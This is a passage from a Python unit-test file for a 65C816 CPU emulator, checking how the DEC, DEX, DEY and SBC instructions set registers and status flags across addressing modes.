self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_dec_dp_x_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
# $0000 DEC 0x0010,X
self._write(mpu.memory, 0x0000, (0xD6, 0x10))
mpu.x = 0x03
self._write(mpu.memory, 0x0010 + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.memory[0x0010 + mpu.x])
self.assertEqual(0x00, mpu.memory[0x0010 + 1 + mpu.x])
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEX
def test_dex_decrements_x(self):
mpu = self._make_mpu()
mpu.x = 0x110
# $0000 DEX
mpu.memory[0x0000] = 0xCA
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x10F, mpu.x)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dex_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
mpu.x = 0x00
# $0000 DEX
mpu.memory[0x0000] = 0xCA
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0xffFF, mpu.x)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dex_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
mpu.x = 0x01
# $0000 DEX
mpu.memory[0x0000] = 0xCA
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x0000, mpu.x)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# DEY
def test_dey_decrements_y(self):
mpu = self._make_mpu()
mpu.y = 0x110
# $0000 DEY
mpu.memory[0x0000] = 0x88
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x10F, mpu.y)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_dey_below_00_rolls_over_and_sets_negative_flag(self):
mpu = self._make_mpu()
mpu.y = 0x00
# $0000 DEY
mpu.memory[0x0000] = 0x88
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0xFFff, mpu.y)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
def test_dey_sets_zero_flag_when_decrementing_to_zero(self):
mpu = self._make_mpu()
mpu.y = 0x01
# $0000 DEY
mpu.memory[0x0000] = 0x88
mpu.step()
self.assertEqual(0x0001, mpu.pc)
self.assertEqual(0x0000, mpu.y)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
# *** TODO: probably makes sense to move the relevant values to the high byte or perhaps both since we've already tested the low byte in 8 bit ***
# SBC Absolute
def test_sbc_abs_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC $ABCD
self._write(mpu.memory, 0x0000, (0xED, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC $ABCD
self._write(mpu.memory, 0x0000, (0xED, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC $ABCD
self._write(mpu.memory, 0x0000, (0xED, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC $ABCD
self._write(mpu.memory, 0x0000, (0xED, 0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.CARRY)
# SBC Absolute, X-Indexed
def test_sbc_abs_x_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC $FEE0,X
self._write(mpu.memory, 0x0000, (0xFD, 0xE0, 0xFE))
mpu.x = 0x0D
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_x_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC $FEE0,X
self._write(mpu.memory, 0x0000, (0xFD, 0xE0, 0xFE))
mpu.x = 0x0D
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_x_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC $FEE0,X
self._write(mpu.memory, 0x0000, (0xFD, 0xE0, 0xFE))
mpu.x = 0x0D
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_x_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC $FEE0,X
self._write(mpu.memory, 0x0000, (0xFD, 0xE0, 0xFE))
mpu.x = 0x0D
self._write(mpu.memory, 0xFEED, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.CARRY)
# SBC Absolute, Y-Indexed
def test_sbc_abs_y_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC $FEE0,Y
self._write(mpu.memory, 0x0000, (0xF9, 0xE0, 0xFE))
mpu.y = 0x0D
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_y_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC $FEE0,Y
self._write(mpu.memory, 0x0000, (0xF9, 0xE0, 0xFE))
mpu.y = 0x0D
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_y_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC $FEE0,Y
self._write(mpu.memory, 0x0000, (0xF9, 0xE0, 0xFE))
mpu.y = 0x0D
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_abs_y_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC $FEE0,Y
self._write(mpu.memory, 0x0000, (0xF9, 0xE0, 0xFE))
mpu.y = 0x0D
self._write(mpu.memory, 0xFEED, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.CARRY)
# SBC Direct Page
def test_sbc_dp_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC $10
self._write(mpu.memory, 0x0000, (0xE5, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC $10
self._write(mpu.memory, 0x0000, (0xE5, 0x10))
self._write(mpu.memory, 0x0010, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# => SBC $10
self._write(mpu.memory, 0x0000, (0xE5, 0x10))
self._write(mpu.memory, 0x0010, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# => SBC $10
self._write(mpu.memory, 0x0000, (0xE5, 0x10))
self._write(mpu.memory, 0x0010, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.CARRY)
# SBC Direct Page, X-Indexed
def test_sbc_dp_x_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC $10,X
self._write(mpu.memory, 0x0000, (0xF5, 0x10))
mpu.x = 0x0D
self._write(mpu.memory, 0x001D, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_x_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC $10,X
self._write(mpu.memory, 0x0000, (0xF5, 0x10))
mpu.x = 0x0D
self._write(mpu.memory, 0x001D, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_x_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC $10,X
self._write(mpu.memory, 0x0000, (0xF5, 0x10))
mpu.x = 0x0D
self._write(mpu.memory, 0x001D, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_x_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC $10,X
self._write(mpu.memory, 0x0000, (0xF5, 0x10))
mpu.x = 0x0D
self._write(mpu.memory, 0x001D, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.CARRY)
# SBC Direct Page Indirect, Indexed (X)
def test_sbc_ind_x_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC ($10,X)
# $0013 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xE1, 0x10))
self._write(mpu.memory, 0x0013, (0xED, 0xFE))
mpu.x = 0x03
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_x_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC ($10,X)
# $0013 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xE1, 0x10))
self._write(mpu.memory, 0x0013, (0xED, 0xFE))
mpu.x = 0x03
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_x_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC ($10,X)
# $0013 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xE1, 0x10))
self._write(mpu.memory, 0x0013, (0xED, 0xFE))
mpu.x = 0x03
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_x_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC ($10,X)
# $0013 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xE1, 0x10))
self._write(mpu.memory, 0x0013, (0xED, 0xFE))
mpu.x = 0x03
self._write(mpu.memory, 0xFEED, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.CARRY)
# SBC Direct Page, Indirect
def test_sbc_dp_ind_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC ($10)
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF2, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_ind_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC ($10)
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF2, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_ind_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC ($10)
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF2, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_dp_ind_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC ($10)
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF2, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED, (0x02, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(5, mpu.processorCycles)
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.CARRY)
# SBC Direct Page Indexed, Indirect (Y)
def test_sbc_ind_y_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
mpu.y = 0x03
# $0000 SBC ($10),Y
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF1, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_y_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC ($10),Y
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF1, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED + mpu.y, (0x01, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_y_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC ($10),Y
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF1, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_ind_y_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC ($10),Y
# $0010 Vector to $FEED
self._write(mpu.memory, 0x0000, (0xF1, 0x10))
self._write(mpu.memory, 0x0010, (0xED, 0xFE))
self._write(mpu.memory, 0xFEED + mpu.y, (0x02, 0x00))
mpu.step()
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.CARRY)
# SBC Immediate
def test_sbc_imm_all_zeros_and_no_borrow_is_zero(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x00
# $0000 SBC #$00
self._write(mpu.memory, 0x0000, (0xE9, 0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_imm_downto_zero_no_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p |= mpu.CARRY # borrow = 0
mpu.a = 0x01
# $0000 SBC #$01
self._write(mpu.memory, 0x0000, (0xE9, 0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_imm_downto_zero_with_borrow_sets_z_clears_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x01
# $0000 SBC #$00
self._write(mpu.memory, 0x0000, (0xE9, 0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.CARRY, mpu.CARRY)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_sbc_imm_downto_four_with_borrow_clears_z_n(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.DECIMAL)
mpu.p &= ~(mpu.CARRY) # borrow = 1
mpu.a = 0x07
# $0000 SBC #$02
self._write(mpu.memory, 0x0000, (0xE9, 0x02, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x04, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertEqual(mpu.CARRY, mpu.CARRY)
# def test_sbc_bcd_on_immediate_0a_minus_00_carry_set(self):
# mpu = self._make_mpu()
# mpu.p |= mpu.DECIMAL
# mpu.p |= mpu.CARRY
# mpu.a = 0x0a
# # $0000 SBC #$00
# self._write(mpu.memory, 0x0000, (0xe9, 0x00, 0x00))
# mpu.step()
# self.assertEqual(0x0003, mpu.pc)
# self.assertEqual(0x0a, mpu.a)
# self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# self.assertEqual(0, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
#
# def test_sbc_bcd_on_immediate_9a_minus_00_carry_set(self):
# mpu = self._make_mpu()
# mpu.p |= mpu.DECIMAL
# mpu.p |= mpu.CARRY
# mpu.a = 0x9a
# #$0000 SBC #$00
# self._write(mpu.memory, 0x0000, (0xe9, 0x00, 0x00))
# mpu.step()
# self.assertEqual(0x0003, mpu.pc)
# self.assertEqual(0x9a, mpu.a)
# self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
# self.assertEqual(0, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
#
# def test_sbc_bcd_on_immediate_00_minus_01_carry_set(self):
# mpu = self._make_mpu()
# mpu.p |= mpu.DECIMAL
# mpu.p |= mpu.OVERFLOW
# mpu.p |= mpu.ZERO
# mpu.p |= mpu.CARRY
# mpu.a = 0x00
# # => $0000 SBC #$00
# self._write(mpu.memory, 0x0000, (0xe9, 0x01, 0x00))
# mpu.step()
# self.assertEqual(0x0003, mpu.pc)
# self.assertEqual(0x99, mpu.a)
# self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
# self.assertEqual(0, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(0, mpu.p & mpu.CARRY)
#
# def test_sbc_bcd_on_immediate_20_minus_0a_carry_unset(self):
# mpu = self._make_mpu()
# mpu.p |= mpu.DECIMAL
# mpu.a = 0x20
# # $0000 SBC #$00
# self._write(mpu.memory, 0x0000, (0xe9, 0x0a, 0x00))
# mpu.step()
# self.assertEqual(0x0003, mpu.pc)
# self.assertEqual(0x1f, mpu.a)
# self.assertEqual(0, mpu.p & mpu.NEGATIVE)
# self.assertEqual(0, mpu.p & mpu.OVERFLOW)
# self.assertEqual(0, mpu.p & mpu.ZERO)
# self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
# Test Helpers
def _make_mpu(self, *args, **kargs):
klass = self._get_target_class()
mpu = klass(*args, **kargs)
if 'memory' not in kargs:
mpu.memory = 0x30000 * [0xAA]
# set native mode
mpu.pCLR(mpu.CARRY)
mpu.inst_0xfb() # XCE
mpu.pCLR(mpu.CARRY) # many 6502 based tests expect the carry flag to be clear
mpu.pCLR(mpu.MS)
mpu.pCLR(mpu.IRS)
# py65 mpus have sp set to $ff, I've modeled the 65816
# based on the physical chip which requires sp to be set
# in software. The core tests assume sp is set to $ff,
# so we have to set sp here
mpu.sp = 0x1ff
return mpu
def _write(self, memory, start_address, bytes):
memory[start_address:start_address + len(bytes)] = bytes
def _get_target_class(self):
return devices.mpu65c816.MPU
def test_suite():
return unittest.findTestCases(sys.modules[__name__])
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| 37.397556
| 150
| 0.602875
| 16,688
| 119,373
| 4.124401
| 0.021273
| 0.202243
| 0.060615
| 0.114546
| 0.968458
| 0.961673
| 0.955411
| 0.947652
| 0.946068
| 0.942698
| 0
| 0.100694
| 0.266149
| 119,373
| 3,191
| 151
| 37.409276
| 0.684996
| 0.084969
| 0
| 0.859952
| 0
| 0
| 0.000276
| 0
| 0
| 0
| 0.095473
| 0.000313
